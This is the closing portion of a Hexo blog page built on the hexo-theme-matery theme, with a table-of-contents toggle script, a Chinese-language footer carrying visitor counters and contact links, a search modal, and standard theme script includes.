        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).slideUp(500);
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).slideDown(500);
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>
    

</main>


<footer class="page-footer bg-color">
    <div class="container row center-align">
        <div class="col s12 m8 l8 copy-right">
            本站由&copy;<a href="https://blinkfox.github.io/" target="_blank">Blinkfox</a>基于
            <a href="https://hexo.io/" target="_blank">Hexo</a> 的
            <a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">hexo-theme-matery</a>主题搭建.

            

            
			
                <br>
                
                <span id="busuanzi_container_site_pv">
                    <i class="fa fa-heart-o"></i>
                    本站总访问量 <span id="busuanzi_value_site_pv" class="white-color"></span>
                </span>
                
                
                <span id="busuanzi_container_site_uv">
                    <i class="fa fa-users"></i>
                    次,&nbsp;访客数 <span id="busuanzi_value_site_uv" class="white-color"></span> 人.
                </span>
                
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">


    <a href="mailto:1920854803@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fa fa-envelope-open"></i>
    </a>



    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=1920854803" class="tooltipped" data-tooltip="QQ联系我: 1920854803" data-position="top" data-delay="50">
        <i class="fa fa-qq"></i>
    </a>


</div>
    </div>
</footer>

<div class="progress-bar"></div>


<!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fa fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="/js/search.js"></script>
<script type="text/javascript">
$(function () {
    searchFunc("/" + "search.xml", 'searchInput', 'searchResult');
});
</script>
<!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fa fa-angle-up"></i>
    </a>
</div>


<script src="/libs/materialize/materialize.min.js"></script>
<script src="/libs/masonry/masonry.pkgd.min.js"></script>
<script src="/libs/aos/aos.js"></script>
<script src="/libs/scrollprogress/scrollProgress.min.js"></script>
<script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
<script src="/js/matery.js"></script>

<!-- Global site tag (gtag.js) - Google Analytics -->



    <script src="/libs/others/clicklove.js"></script>


    <script async src="/libs/others/busuanzi.pure.mini.js"></script>


{% if theme.fireworks %}
   <canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 1; pointer-events: none;" ></canvas> 
   <script type="text/javascript" src="//cdn.bootcss.com/animejs/2.2.0/anime.min.js"></script> 
   <script type="text/javascript" src="/js/src/fireworks.js"></script>
{% endif %}
</body>
</html>